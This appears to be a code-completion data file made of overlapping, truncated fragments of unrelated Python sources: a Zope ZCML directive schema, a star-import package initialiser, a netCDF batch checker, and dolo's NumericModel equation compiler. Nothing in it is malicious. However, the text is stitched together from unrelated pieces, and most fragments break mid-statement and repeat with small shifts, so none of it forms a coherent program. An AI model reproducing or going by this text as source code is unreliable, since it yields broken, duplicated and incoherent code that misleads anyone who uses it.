zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens(", "whos names to provide access to. Access \" u\"will be provided to all", "import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml", "list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface =", "the factory used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\"", "FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive", "import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import", "# # Copyright (c) 2001, 2002 Zope Foundation and Contributors. # All Rights", "set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list of", "required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is", "that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can", "access any names provided directly in the attributes attribute or any names defined", "of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens(", "\" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative", "from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface", "that this content class should be configured in the same way the specified", "zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import", "a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the", "in a given Interface require a given permission for access. \"\"\" permission =", "import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\")," ]
[ "from .display import * from .getters import * from .pattern import * from", "from .density import * from .display import * from .getters import * from", "import * from .pattern import * from .patternartist import * __all__ = [name", ".getters import * from .pattern import * from .patternartist import * __all__ =", ".patternartist import * __all__ = [name for name in dir() if not name.startswith('_')]", "from .pattern import * from .patternartist import * __all__ = [name for name", "print_function from .density import * from .display import * from .getters import *", "__future__ import absolute_import from __future__ import division from __future__ import print_function from .density", "from __future__ import print_function from .density import * from .display import * from", "import print_function from .density import * from .display import * from .getters import", "import * from .patternartist import * __all__ = [name for name in dir()", "import absolute_import from __future__ import division from __future__ import print_function from .density import", "from __future__ import division from __future__ import print_function from .density import * from", "import division from __future__ import print_function from .density import * from .display import", "division from __future__ import print_function from .density import * from .display import *", "import * from .display import * from .getters import * from .pattern import", "* from .display import * from .getters import * from .pattern import *", ".display import * from .getters import * from .pattern import * from .patternartist", "from __future__ import absolute_import from __future__ import division from __future__ import print_function from", "* from .getters import * from .pattern import * from .patternartist import *", "from .getters import * from .pattern import * from .patternartist import * __all__", ".pattern import * from .patternartist import * __all__ = [name for name in", "__future__ import print_function from .density import * from .display import * from .getters", "* from .pattern import * from .patternartist import * __all__ = [name for", "__future__ import division from __future__ import print_function from .density import * from .display", ".density import * from .display import * from .getters import * from .pattern", "* from .patternartist import * __all__ = [name for name in dir() if", "from .patternartist import * __all__ = [name for name in dir() if not", "import * from .getters import * from .pattern import * from .patternartist import", "absolute_import from __future__ import division from __future__ import print_function from .density import *" ]
[ "Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file", "Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could", "in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile,", "\".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file =", "try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile),", "outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except", ".Dataset import Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for", "from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist:", "i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read file: \"+str(path))", "Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as", "Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\",", "= Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path)", "check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try:", "def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\"))", "pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with", "import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile =", "i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read file:", "pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile", "pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False)", "as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not", "import Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path", "for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data:", "i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read", "path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check()", "= Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception:", "Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in", "full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read file: \"+str(path)) text_file.close()", "from .Dataset import Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc')", "with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\")" ]
[ "= self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs])", "= self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist", "'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else:", "in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown", "decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) #", "original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not", "{} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations:", "= CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic", "0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') #", "n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec =", "k not in ('parameters','shocks','values')], ()) self.options = options if options is not None", "eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names:", "symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args,", "CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import", "defs = self.symbolic.definitions # works for fg models only model_type = self.model_type if", "1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\"", "lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs,", "gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output", "= self.symbols # should match self.symbols comps = [] functions = {} original_functions", "pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import", "for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options", "the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system(", "self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr,", "= self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception if unknown", "upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs", "= None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model", "# rewrite all equations as rhs - lhs def filter_equal(eq): if '=' in", "''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp))", "import njit class NumericModel: calibration = None calibration_dict = None covariances = None", "self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according", "system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from", "to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res] if", "match self.symbols comps = [] functions = {} original_functions = {} original_gufunctions =", "for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name =", "= [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname,", "# self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to", "calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def", "self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) #", "if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs,", "dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for", "residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property", "res[1] != control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead of", "for p in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for", "t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound,", "arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0] ==", "# raise exception if unknown symbol ? if len(args)==2: pname, pvalue = args", "eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib", "original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import", "calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict)", "= args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue", "tuple): return tuple( [ self.get_calibration(p) for p in pname ] ) elif len(args)>0:", "1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals =", "fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__", "+= '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return", "be either: - None - \"a<=expr\" where a is a controls - \"expr<=a\"", "import numpy # updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict", "target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2] =", "gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex", "------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n-", "self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols,", "according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict", "symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e)", "either: - None - \"a<=expr\" where a is a controls - \"expr<=a\" where", "timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time]", "original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound #", "doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only", "= {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in", "ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols,", "distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain =", "= (pname,) + args return self.get_calibration(pnames) group = [g for g in self.symbols.keys()", "set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ? if len(args)==2: pname,", "dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg models only model_type", "NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution =", "original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs - lhs def filter_equal(eq):", "ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols,", "= gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs - lhs", ")'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq eqs = [filter_equal(eq)", "rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs =", "= gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re", "return v def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ?", "eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp =", "= [] functions = {} original_functions = {} original_gufunctions = {} for funname", "> 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss +=", "if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else:", "Model object: ------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss", "dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols #", "= {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if", "not None else {} self.infos = infos if infos is not None else", "if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain", "self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in", "is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable", "import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution", "[r.strip() for r in res] if res[1] != control: msg = \"Complementarity condition", "rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq =", "'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec,", "i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): #", "eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val = 0", "if '=' in eq: lhs, rhs = str.split(eq,'=') eq = '{} - (", "rewrite all equations as rhs - lhs def filter_equal(eq): if '=' in eq:", "eqs=eq) ss += \"\\n\" s += ss # import pprint # s +=", "if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs", "ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if", "# keep only right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname]", "< 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals", "calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval", "[tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options =", "definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system )", "comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs", "filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq = '{} -", "abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8:", "= len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]]", "return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self,", "self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp,", "covariances = None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic =", "= [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq in eqs]", "from collections import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple", "def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables =", "k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] =", "eq = '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq", "= original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control):", "''' # comp can be either: - None - \"a<=expr\" where a is", "decode_complementarity(comp, control): ''' # comp can be either: - None - \"a<=expr\" where", "self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain", "None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order =", "eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs", "pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s", "= ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables,", "abs(val) > 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss", "eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function", "eq eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs =", "__repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb']", "standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] =", "= res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if", "return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import", "(pname,) + args return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if", "rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname),", "context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs =", "= decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps)", "for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp", "OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs)", "to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict =", "raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'):", "OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t])", "where a is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except:", "import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class NumericModel:", "'{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if", "Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self,", "not in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary']", "comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in", "self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to the symbolic definitions", "if abs(val) > 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\")", "spec.get('target'): # keep only right-hand side # TODO: restore recursive definitions eqs =", "vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') # eq", "pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p in pname ]", "p in pname ] ) elif len(args)>0: pnames = (pname,) + args return", "ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\"", "v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols", "ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time)", "type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side # TODO:", "for eq in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec =", "= len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None", "in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp,", "def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None:", "functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] =", "comp can be either: - None - \"a<=expr\" where a is a controls", "solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib =", "self.options = options if options is not None else {} self.infos = infos", "works for fg models only model_type = self.model_type if 'auxiliaries' not in self.symbols:", "== 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args,", "- ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq", "dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector", "control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control,", "condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg) return", "except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v", "args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib", "right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1]", "if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type", "def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq = '{}", "all equations as rhs - lhs def filter_equal(eq): if '=' in eq: lhs,", "t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname,", "u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) <", "None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] #", "from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib)", "markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p", "self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain =", "markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain =", "- lhs def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq", "[filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag", "symbols = self.symbols # should match self.symbols comps = [] functions = {}", "eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname),", "= self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type", "import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg", "\"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition", "else {} self.infos = infos if infos is not None else {} self.infos['data_layout']", "restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs]", "None - \"a<=expr\" where a is a controls - \"expr<=a\" where a is", "eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\"", "\"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res =", "eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf',", "{vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss # import", "recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t", "name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res", "i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val =", "ddefs = OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t =", "infos is not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type", "str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for eq in eqs]", ".symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options)", "= StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe =", "!\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname]", "control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names", "= discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab,", "else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict 